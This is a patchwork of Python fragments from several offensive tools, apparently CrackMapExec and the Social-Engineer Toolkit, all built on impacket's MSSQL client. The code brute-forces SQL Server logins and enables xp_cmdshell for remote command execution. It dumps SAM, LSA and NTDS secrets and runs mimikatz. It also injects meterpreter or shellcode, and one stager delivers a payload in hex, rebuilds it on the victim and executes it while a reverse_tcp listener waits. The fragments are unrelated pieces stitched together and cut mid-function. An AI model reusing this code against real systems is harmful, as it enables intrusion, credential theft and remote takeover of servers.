def crack_in_linux(address, username, password):
'''
中文提示:用户 'sa' 登录失败。
英文提示:Login failed for user
经过测试在linux下成功
window7下报错:struct.error: ('unpack requires a string argument of length 1', "When unpacking field 'Type | <B | ''[:1]'")
'''
host = h.getPath(address)
port = h.getPort(address) if h.getPort(address) != None else 1433
fp = tds.MSSQL(host, int(port))
fp.connect()
r = fp.login(None, username, password, None, None, False)
# 第二种登录方式:r = fp.login(None, username, password, domain, password_hash, True)
if not r:
key = fp.replies[TDS_ERROR_TOKEN][0]
code = key['Number']
mesg = key['MsgText'].decode('utf-16le')
else:
key = fp.replies[TDS_LOGINACK_TOKEN][0]
code = '0'
mesg = '%s (%d%d %d%d)' % (key['ProgName'].decode('utf-16le'),
key['MajorVer'], key['MinorVer'],
key['BuildNumHi'], key['BuildNumLow'])
fp.disconnect()
code = int(code)
if code == 0:
return True, mesg
elif code == 18456:
return False, mesg
else:
return False, mesg
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
core.print_status("Connection established with SQL Server...")
core.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;"
"RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"RECONFIGURE;")
except:
pass
core.print_status(
"Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while True:
# prompt mssql
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
elif cmd:
# execute the command
mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80 * 2
mssql.printRows()
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
ipaddr = str(ipaddr)
print "Attempting to brute force " + bcolors.BOLD + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC
# connect to the sql server and attempt a password
if ":" in ipaddr:
#target_server = _mssql.connect(ipaddr, username, passwords)
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
#target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
sql_server = tds.MSSQL(str(ipaddr), int(port))
# print that we were successful
sql_server.connect()
#target_server = False
target_server = sql_server.login("master", username, passwords)
if target_server:
print_status(
"\nSuccessful login with username %s and password: %s"
% (username, passwords))
counter = 1
break
# if login failed or unavailable server
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr = ipaddr[0]
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
print_warning(
"Unable to guess the SQL password for %s with username of %s"
% (ipaddr, username))
return False
def _check_connection(self):
try:
ms_sql = tds.MSSQL(str(self.target), self.port)
ms_sql.connect()
return ms_sql
except Exception, e:
self.logger.debug('[check_success] error: %s' % str(e))
return False
def mssql_brute(host,
user,
pwd,
port=1433,
windows_auth='0',
domain='',
password_hash=None):
"""
:param host: param user:
:param pwd: param port: (Default value = '1433')
:param windows_auth: Default value = '0')
:param domain: Default value = '')
:param password_hast: Default value = None)
:param user: param port: (Default value = '1433')
:param port: Default value = '1433')
"""
try:
MSSQL_CONN = tds.MSSQL(host, port)
MSSQL_CONN.connect()
if windows_auth == '0':
r = MSSQL_CONN.login(None, user, pwd, None, None, False)
else:
r = MSSQL_CONN.login(None, user, pwd, domain, password_hash,
True)
MSSQL_CONN.disconnect()
_ret_auth = windows_auth if windows_auth != '0' else ''
_ret_password_hash = password_hash if password_hash else ''
if r:
logger.success(
f'mssql success {user}:{pwd}@{host}:{str(port)} ssh ')
return {
"user": user,
"password": pwd,
"ip": host,
"serviceName": "mssql",
"port": port,
"detail": {
"domain": domain,
"windows_auth": _ret_auth,
"password_hash": _ret_password_hash
}
}
""" 我都不知道我之前写这干嘛的。。。。
if not r:
key = MSSQL_CONN.replies[TDS_ERROR_TOKEN][0]
code = key['number']
mesg = key['MsgText'].decode('utf-16le')
else:
key = MSSQL_CONN.replies[TDS_LOGINACK_TOKEN][0]
code = '0'
mesg = '%s (%d%d %d%d)' % (key['ProgName'].decode('utf-16le'), key['MajorVer'], key['MinorVer'], key['BuildNumHi'], key['BuildNumLow'])
"""
except Exception as e:
logger.info(f"{e.args}")
return
def login(self, addr, port, user, pwd):
self.sql = tds.MSSQL(addr, int(port))
self.sql.connect()
try:
# login(self, database, username, password='', domain='',
# hashes = None, useWindowsAuth = False)
self.sql.login(None, user, pwd, '', None, False)
except e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
def __connect(self):
self.sql = tds.MSSQL(self.address, int(self.port))
self.sql.connect()
login = self.sql.login(self.db, self.username, self.password,
self.domain, self.hashes, False)
if login:
self.sql.sql_query("Select @@Version")
self.sql.printReplies()
self.sql.printRows()
return login
def connect_mssql(ip, port=1433, username="******", password="", domain=""):
# do database connection (simple for now)
ms_sql = tds.MSSQL(ip, port)
ms_sql.connect()
res = ms_sql.login(database = None, username=username, password=password, domain=domain)
ms_sql.printReplies()
if res:
return XpShell(ms_sql)
else:
return res
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
)
except Exception, e:
pass
def mssql_greenlet(host, server_name, domain):
cme_logger = CMEAdapter(
logging.getLogger('CME'), {
'host': host,
'hostname': server_name,
'port': settings.args.mssql_port,
'service': 'MSSQL'
})
try:
ms_sql = tds.MSSQL(host, int(settings.args.mssql_port), cme_logger)
ms_sql.connect()
except socket.error as e:
if settings.args.verbose: print_error(str(e))
return
if settings.args.mssql_instance:
instances = ms_sql.getInstances(5)
if len(instances) == 0:
cme_logger.info("No MSSQL Instances found")
else:
cme_logger.success("Enumerating MSSQL instances")
for i, instance in enumerate(instances):
cme_logger.results("Instance {}".format(i))
for key in instance.keys():
cme_logger.results(key + ":" + instance[key])
if settings.args.mssql is not None:
ms_sql, user, passwd, ntlm_hash, domain = smart_login(
host, domain, ms_sql, cme_logger)
sql_shell = SQLSHELL(ms_sql, cme_logger)
if settings.args.mssql != '':
sql_shell.onecmd(settings.args.mssql)
if settings.args.enable_xpcmdshell:
sql_shell.onecmd('enable_xp_cmdshell')
if settings.args.disable_xpcmdshell:
sql_shell.onecmd('disable_xp_cmdshell')
if settings.args.xp_cmd:
sql_shell.onecmd("xp_cmdshell {}".format(settings.args.xp_cmd))
ms_sql.disconnect()
def check_creds(server,
username,
password,
domain='',
db='',
port=1433,
kerberos=True):
has_access = False
try:
ms_sql = tds.MSSQL(server, port)
ms_sql.connect()
if kerberos is True:
ms_sql.kerberosLogin(db, username, password, domain)
else:
ms_sql.login(db, username, password, domain)
ms_sql.disconnect()
has_access = True
except:
has_access = False
return has_access
def main_greenlet(host):
try:
smb = SMBConnection(host, host, None, settings.args.port)
#Get our IP from the socket
local_ip = smb.getSMBServer().get_socket().getsockname()[0]
try:
smb.login('', '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.message:
pass
domain = settings.args.domain
s_name = smb.getServerName()
if not domain:
domain = smb.getServerDomain()
if not domain:
domain = s_name
cme_logger = CMEAdapter(
logging.getLogger('CME'), {
'host': host,
'hostname': s_name,
'port': settings.args.port,
'service': 'SMB'
})
cme_logger.info(u"{} (name:{}) (domain:{})".format(
smb.getServerOS(), s_name, domain))
try:
'''
DC's seem to want us to logoff first
Windows workstations sometimes reset the connection, so we handle both cases here
(go home Windows, you're drunk)
'''
smb.logoff()
except NetBIOSError:
pass
except socket.error:
pass
if settings.args.mssql:
cme_logger = CMEAdapter(
logging.getLogger('CME'), {
'host': host,
'hostname': s_name,
'port': settings.args.mssql_port,
'service': 'MSSQL'
})
#try:
ms_sql = tds.MSSQL(host, int(settings.args.mssql_port), cme_logger)
ms_sql.connect()
instances = ms_sql.getInstances(5)
cme_logger.info("Found {} MSSQL instance(s)".format(
len(instances)))
for i, instance in enumerate(instances):
cme_logger.results("Instance {}".format(i))
for key in instance.keys():
cme_logger.results(key + ":" + instance[key])
try:
ms_sql.disconnect()
except:
pass
#except socket.error as e:
# if settings.args.verbose: mssql_cme_logger.error(str(e))
if (settings.args.user and
(settings.args.passwd
or settings.args.hash)) or settings.args.combo_file:
ms_sql = None
smb = None
if settings.args.mssql:
ms_sql = tds.MSSQL(host, int(settings.args.mssql_port),
cme_logger)
ms_sql.connect()
ms_sql, user, passwd, ntlm_hash, domain = smart_login(
host, domain, ms_sql, cme_logger)
sql_shell = SQLSHELL(ms_sql, cme_logger)
else:
smb = SMBConnection(host, host, None, settings.args.port)
smb, user, passwd, ntlm_hash, domain = smart_login(
host, domain, smb, cme_logger)
if ms_sql:
connection = ms_sql
if settings.args.mssql_query:
sql_shell.onecmd(settings.args.mssql_query)
if smb:
connection = smb
if settings.args.delete or settings.args.download or settings.args.list or settings.args.upload:
rfs = RemoteFileSystem(host, smb, cme_logger)
if settings.args.delete:
rfs.delete()
if settings.args.download:
rfs.download()
if settings.args.upload:
rfs.upload()
if settings.args.list:
rfs.list()
if settings.args.enum_shares:
shares = SHAREDUMP(smb, cme_logger)
shares.dump(host)
if settings.args.enum_users:
users = SAMRDump(cme_logger,
'{}/SMB'.format(settings.args.port), user,
passwd, domain, ntlm_hash,
settings.args.aesKey, settings.args.kerb)
users.dump(host)
if settings.args.sam or settings.args.lsa or settings.args.ntds:
dumper = DumpSecrets(cme_logger, 'logs/{}'.format(host),
smb, settings.args.kerb)
dumper.do_remote_ops()
if settings.args.sam:
dumper.dump_SAM()
if settings.args.lsa:
dumper.dump_LSA()
if settings.args.ntds:
dumper.dump_NTDS(settings.args.ntds,
settings.args.ntds_history,
settings.args.ntds_pwdLastSet)
dumper.cleanup()
if settings.args.pass_pol:
pass_pol = PassPolDump(cme_logger,
'{}/SMB'.format(settings.args.port),
user, passwd, domain, ntlm_hash,
settings.args.aesKey,
settings.args.kerb)
pass_pol.dump(host)
if settings.args.rid_brute:
lookup = LSALookupSid(cme_logger, user, passwd, domain,
'{}/SMB'.format(settings.args.port),
ntlm_hash, settings.args.rid_brute)
lookup.dump(host)
if settings.args.enum_sessions or settings.args.enum_disks or settings.args.enum_lusers:
rpc_query = RPCQUERY(cme_logger, user, passwd, domain,
ntlm_hash)
if settings.args.enum_sessions:
rpc_query.enum_sessions(host)
if settings.args.enum_disks:
rpc_query.enum_disks(host)
if settings.args.enum_lusers:
rpc_query.enum_lusers(host)
if settings.args.spider:
smb_spider = SMBSPIDER(cme_logger, host, smb)
smb_spider.spider(settings.args.spider,
settings.args.depth)
smb_spider.finish()
if settings.args.wmi_query:
wmi_query = WMIQUERY(cme_logger, user, domain, passwd,
ntlm_hash, settings.args.kerb,
settings.args.aesKey)
wmi_query.run(settings.args.wmi_query, host,
settings.args.namespace)
if settings.args.check_uac:
uac = UACdump(cme_logger, smb, settings.args.kerb)
uac.run()
if settings.args.enable_wdigest or settings.args.disable_wdigest:
wdigest = WdisgestEnable(cme_logger, smb,
settings.args.kerb)
if settings.args.enable_wdigest:
wdigest.enable()
elif settings.args.disable_wdigest:
wdigest.disable()
if settings.args.service:
service_control = SVCCTL(
cme_logger, user, passwd, domain,
'{}/SMB'.format(settings.args.port),
settings.args.service, settings.args.aesKey,
settings.args.kerb, ntlm_hash, settings.args)
service_control.run(host)
if settings.args.command:
EXECUTOR(cme_logger, settings.args.command, host, domain,
settings.args.no_output, connection,
settings.args.execm, user, passwd, ntlm_hash)
if settings.args.pscommand:
EXECUTOR(
cme_logger,
ps_command(settings.args.pscommand, settings.args.ps_arch),
host, domain, settings.args.no_output, connection,
settings.args.execm, user, passwd, ntlm_hash)
if settings.args.mimikatz:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.mimikatz(), host, domain,
True, connection, settings.args.execm, user, passwd,
ntlm_hash)
if settings.args.gpp_passwords:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.gpp_passwords(), host,
domain, True, connection, settings.args.execm, user,
passwd, ntlm_hash)
if settings.args.mimikatz_cmd:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger,
powah_command.mimikatz(settings.args.mimikatz_cmd),
host, domain, True, connection, settings.args.execm,
user, passwd, ntlm_hash)
if settings.args.powerview:
#For some reason powerview functions only seem to work when using smbexec...
#I think we might have a mistery on our hands boys and girls!
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger,
powah_command.powerview(settings.args.powerview),
host, domain, True, connection, 'smbexec', user,
passwd, ntlm_hash)
if settings.args.tokens:
powah_command = PowerShell(settings.args.server, local_ip)
EXECUTOR(cme_logger, powah_command.token_enum(), host, domain,
True, connection, settings.args.execm, user, passwd,
ntlm_hash)
if settings.args.inject:
powah_command = PowerShell(settings.args.server, local_ip)
if settings.args.inject.startswith('met_'):
EXECUTOR(cme_logger, powah_command.inject_meterpreter(),
host, domain, True, connection,
settings.args.execm, user, passwd, ntlm_hash)
if settings.args.inject == 'shellcode':
EXECUTOR(cme_logger, powah_command.inject_shellcode(),
host, domain, True, connection,
settings.args.execm, user, passwd, ntlm_hash)
if settings.args.inject == 'dll' or settings.args.inject == 'exe':
EXECUTOR(cme_logger, powah_command.inject_exe_dll(), host,
domain, True, connection, settings.args.execm,
user, passwd, ntlm_hash)
try:
smb.logoff()
except:
pass
try:
ms_sql.disconnect()
except:
pass
except SessionError as e:
print_error("{}:{} {}".format(host, settings.args.port, e))
if settings.args.verbose: traceback.print_exc()
except NetBIOSError as e:
print_error("{}:{} NetBIOS Error: {}".format(host, settings.args.port,
e))
if settings.args.verbose: traceback.print_exc()
except DCERPCException as e:
print_error("{}:{} DCERPC Error: {}".format(host, settings.args.port,
e))
if settings.args.verbose: traceback.print_exc()
except socket.error as e:
if settings.args.verbose: print_error(str(e))
return
def connector(target, args, db, module, context, cmeserver):
try:
smb = SMBConnection(target, target, None, args.smb_port)
#Get our IP from the socket
local_ip = smb.getSMBServer().get_socket().getsockname()[0]
#Get the remote ip address (in case the target is a hostname)
remote_ip = smb.getRemoteHost()
try:
smb.login('' , '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.message:
pass
domain = smb.getServerDomain()
servername = smb.getServerName()
serveros = smb.getServerOS()
if not domain:
domain = servername
db.add_host(remote_ip, servername, domain, serveros)
logger = CMEAdapter(getLogger('CME'), {'host': remote_ip, 'port': args.smb_port, 'hostname': u'{}'.format(servername)})
logger.info(u"{} (name:{}) (domain:{})".format(serveros, servername.decode('utf-8'), domain.decode('utf-8')))
try:
'''
DC's seem to want us to logoff first
Windows workstations sometimes reset the connection, so we handle both cases here
(go home Windows, you're drunk)
'''
smb.logoff()
except NetBIOSError:
pass
except socket.error:
pass
if args.mssql:
instances = None
logger.extra['port'] = args.mssql_port
ms_sql = tds.MSSQL(target, args.mssql_port, logger)
ms_sql.connect()
instances = ms_sql.getInstances(10)
if len(instances) > 0:
logger.info("Found {} MSSQL instance(s)".format(len(instances)))
for i, instance in enumerate(instances):
logger.highlight("Instance {}".format(i))
for key in instance.keys():
logger.highlight(key + ":" + instance[key])
try:
ms_sql.disconnect()
except:
pass
if args.username and (args.password or args.hash):
conn = None
if args.mssql and (instances is not None and len(instances) > 0):
conn = tds.MSSQL(target, args.mssql_port, logger)
conn.connect()
elif not args.mssql:
conn = SMBConnection(target, target, None, args.smb_port)
if conn is None:
return
if args.domain:
domain = args.domain
connection = Connection(args, db, target, servername, domain, conn, logger, cmeserver)
if (connection.password is not None or connection.hash is not None) and connection.username is not None:
if module is not None:
module_logger = CMEAdapter(getLogger('CME'), {'module': module.name.upper(), 'host': remote_ip, 'port': args.smb_port, 'hostname': servername})
context = Context(db, module_logger, args)
context.localip = local_ip
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
cmeserver.server.context.localip = local_ip
if hasattr(module, 'on_login'):
module.on_login(context, connection)
if hasattr(module, 'on_admin_login') and connection.admin_privs:
module.on_admin_login(context, connection)
else:
if connection.admin_privs and (args.pscommand or args.command):
get_output = True if args.no_output is False else False
if args.mssql: args.exec_method = 'mssqlexec'
if args.command:
output = connection.execute(args.command, get_output=get_output)
if args.pscommand:
output = connection.execute(create_ps_command(args.pscommand), get_output=get_output)
logger.success('Executed command {}'.format('via {}'.format(args.exec_method) if args.exec_method else ''))
buf = StringIO(output).readlines()
for line in buf:
logger.highlight(line.strip())
if args.mssql and args.mssql_query:
conn.sql_query(args.mssql_query)
query_output = conn.printRows()
logger.success('Executed MSSQL query')
buf = StringIO(query_output).readlines()
for line in buf:
logger.highlight(line.strip())
elif not args.mssql:
if connection.admin_privs and (args.sam or args.lsa or args.ntds):
secrets_dump = DumpSecrets(connection, logger)
if args.sam:
secrets_dump.SAM_dump()
if args.lsa:
secrets_dump.LSA_dump()
if args.ntds:
secrets_dump.NTDS_dump(args.ntds, args.ntds_pwdLastSet, args.ntds_history)
if connection.admin_privs and args.wdigest:
w_digest = WDIGEST(logger, connection.conn)
if args.wdigest == 'enable':
w_digest.enable()
elif args.wdigest == 'disable':
w_digest.disable()
if connection.admin_privs and args.uac:
UAC(connection.conn, logger).enum()
if args.spider:
spider = SMBSpider(logger, connection, args)
spider.spider(args.spider, args.depth)
spider.finish()
if args.enum_shares:
ShareEnum(connection.conn, logger).enum()
if args.enum_lusers or args.enum_disks or args.enum_sessions:
rpc_connection = RPCQUERY(connection, logger)
if args.enum_lusers:
rpc_connection.enum_lusers()
if args.enum_sessions:
rpc_connection.enum_sessions()
if args.enum_disks:
rpc_connection.enum_disks()
if args.pass_pol:
PassPolDump(logger, args.smb_port, connection).enum()
if args.enum_users:
SAMRDump(logger, args.smb_port, connection).enum()
if connection.admin_privs and args.wmi_query:
WMIQUERY(logger, connection, args.wmi_namespace).query(args.wmi_query)
if args.rid_brute:
LSALookupSid(logger, args.smb_port, connection, args.rid_brute).brute_force()
except socket.error:
return
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
ms_sql = tds.MSSQL(address, int(options.port))
ms_sql.connect()
try:
if options.k is True:
res = ms_sql.kerberosLogin(options.db,
username,
password,
domain,
options.hashes,
options.aesKey,
kdcHost=options.dc_ip)
else:
res = ms_sql.login(options.db, username, password, domain,
options.hashes, options.windows_auth)
ms_sql.printReplies()
except Exception as e:
print(version.BANNER)
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser(
add_help=True,
description="Asks the remote host for its running MSSQL Instances.")
parser.add_argument('host', action='store', help='target host')
parser.add_argument('-timeout',
action='store',
default='5',
help='timeout to wait for an answer')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
ms_sql = tds.MSSQL(options.host)
instances = ms_sql.getInstances(int(options.timeout))
if len(instances) == 0:
"No MSSQL Instances found"
else:
for i, instance in enumerate(instances):
logging.info("Instance %d" % i)
for key in list(instance.keys()):
print(key + ":" + instance[key])
def __init__(self, args, db, host, module, cmeserver):
self.args = args
self.db = db
self.host = host
self.module = module
self.cmeserver = cmeserver
self.conn = None
self.hostname = None
self.domain = None
self.server_os = None
self.logger = None
self.password = None
self.username = None
self.hash = None
self.admin_privs = False
self.failed_logins = 0
try:
smb = SMBConnection(self.host, self.host, None, self.args.smb_port)
#Get our IP from the socket
local_ip = smb.getSMBServer().get_socket().getsockname()[0]
#Get the remote ip address (in case the target is a hostname)
remote_ip = smb.getRemoteHost()
try:
smb.login('' , '')
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.message:
pass
self.host = remote_ip
self.domain = smb.getServerDomain()
self.hostname = smb.getServerName()
self.server_os = smb.getServerOS()
if not self.domain:
self.domain = self.hostname
self.db.add_host(self.host, self.hostname, self.domain, self.server_os)
self.logger = CMEAdapter(getLogger('CME'), {
'host': self.host,
'port': self.args.smb_port,
'hostname': u'{}'.format(self.hostname)
})
self.logger.info(u"{} (name:{}) (domain:{})".format(
self.server_os,
self.hostname.decode('utf-8'),
self.domain.decode('utf-8')
))
try:
'''
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
smb.logoff()
except:
pass
if self.args.mssql:
instances = None
self.logger.extra['port'] = self.args.mssql_port
mssql = tds.MSSQL(self.host, self.args.mssql_port, self.logger)
mssql.connect()
instances = mssql.getInstances(10)
if len(instances) > 0:
self.logger.info("Found {} MSSQL instance(s)".format(len(instances)))
for i, instance in enumerate(instances):
self.logger.highlight("Instance {}".format(i))
for key in instance.keys():
self.logger.highlight(key + ":" + instance[key])
try:
mssql.disconnect()
except:
pass
if (self.args.username and (self.args.password or self.args.hash)) or self.args.cred_id:
if self.args.mssql and (instances is not None and len(instances) > 0):
self.conn = tds.MSSQL(self.host, self.args.mssql_port, self.logger)
self.conn.connect()
elif not args.mssql:
self.conn = SMBConnection(self.host, self.host, None, self.args.smb_port)
except socket.error:
pass
if self.conn:
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
self.login()
if ((self.password is not None or self.hash is not None) and self.username is not None):
if self.module:
module_logger = CMEAdapter(getLogger('CME'), {
'module': module.name.upper(),
'host': self.host,
'port': self.args.smb_port,
'hostname': self.hostname
})
context = Context(self.db, module_logger, self.args)
context.localip = local_ip
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
cmeserver.server.context.localip = local_ip
if hasattr(module, 'on_login'):
module.on_login(context, self)
if hasattr(module, 'on_admin_login') and self.admin_privs:
module.on_admin_login(context, self)
elif self.module is None:
for k, v in vars(self.args).iteritems():
if hasattr(self, k) and hasattr(getattr(self, k), '__call__'):
if v is not False and v is not None:
getattr(self, k)()
sys.exit(1)
options = parser.parse_args()
import re
domain, username, password, address = re.compile(
'(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
if domain is None:
domain = ''
if options.windows_auth == 'True':
win_auth = True
else:
win_auth = False
ms_sql = tds.MSSQL(address, string.atoi(options.port))
ms_sql.connect()
res = ms_sql.login(options.db, username, password, domain, options.hashes,
win_auth)
ms_sql.printReplies()
if res == True:
shell = SQLSHELL(ms_sql)
if options.file is None:
shell.cmdloop()
else:
for line in options.file.readlines():
print "SQL> %s" % line,
shell.onecmd(line)
ms_sql.disconnect()
def deploy_hex2binary(ipaddr, port, username, password):
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
)
print_status("Checking if powershell is installed on the system...")
# just throw a simple command via powershell to get the output
mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'")
bundle = str(capture(mssql.printRows))
# remove null byte terminators from capture output
bundle = bundle.replace("\\x00", "")
# search for parameter version - standard output for powershell -Version command
match = re.search("parameter version", bundle)
# if we have a match we have powershell installed
if match:
print_status(
"Powershell was identified, targeting server through powershell injection."
)
option = "1"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status(
"Powershell not detected, attempting Windows debug method.")
option = "2"
# if we don't have powershell
if option == "2":
try:
reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
print_status("Connection established with SQL Server...")
print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
subprocess.Popen(
"cp %s/msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir),
shell=True).wait()
subprocess.Popen(
"cp %s//msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir),
shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file(setdir + "/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:
reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%s/msfconsole -r %s/meta_config" %
(msf_path, setdir))
# random executable name
random_exe = generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status(
"Checking what type of operating system either x86 or x64")
mssql.sql_query(
"exec master..xp_cmdshell 'systeminfo | find /I \"System type\"'")
bundle = str(capture(mssql.printRows))
match = re.search("X86", bundle)
if match:
print_status(
"Windows X86 architecture detected. Selecting powershell injection."
)
payload = "x86"
else:
print_status(
"Windows X64 architecture detected. Selecting powershell injection."
)
payload = "x64"
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = raw_input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode..."
)
try:
reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
# here we format everything for us
x64 = file(setdir + "/x64.powershell", "r")
x64 = x64.read()
x64 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x64
x86 = file(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/"
% (setdir))
filewrite = file(
setdir + "/reports/powershell/x64_powershell_injection.txt", "w")
filewrite.write(x64)
filewrite.close()
filewrite = file(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j"
% (port))
filewrite.close()
# if our payload ix x64 based - need to prep msfconsole rc
if payload == "x64":
powershell_command = x64
powershell_dir = setdir + "/reports/powershell/x64_powershell_injection.txt"
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j"
% (port))
filewrite.close()
# grab the metasploit path from config or smart detection
msf_path = meta_path()
if operating_system == "posix":
try:
reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%s/msfconsole -r %s/reports/powershell/powershell.rc" %
(msf_path, setdir))
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
print_status("Deploying initial debug stager to the system.")
random_file = generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
print_status("Deploying stager payload (hex): " + bcolors.BOLD +
str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" %
(line, random_file))
print_status("Converting the stager to a binary...")
# here we convert it to a binary
mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file))
print_status("Conversion complete. Cleaning up...")
# delete the random file
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
print_status(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file(setdir + "/payload.hex", "r")
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
print_status("Deploying payload to victim machine (hex): " +
bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query("exec master..xp_cmdshell 'echo %s>> %s'" %
(data, random_exe))
print_status(
"Delivery complete. Converting hex back to binary format.")
mssql.sql_query("exec master..xp_cmdshell 'rename MOO.bin %s.exe'" %
(random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
print_status("Cleaning up old files..")
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py",
shell=True)
# grab the port options
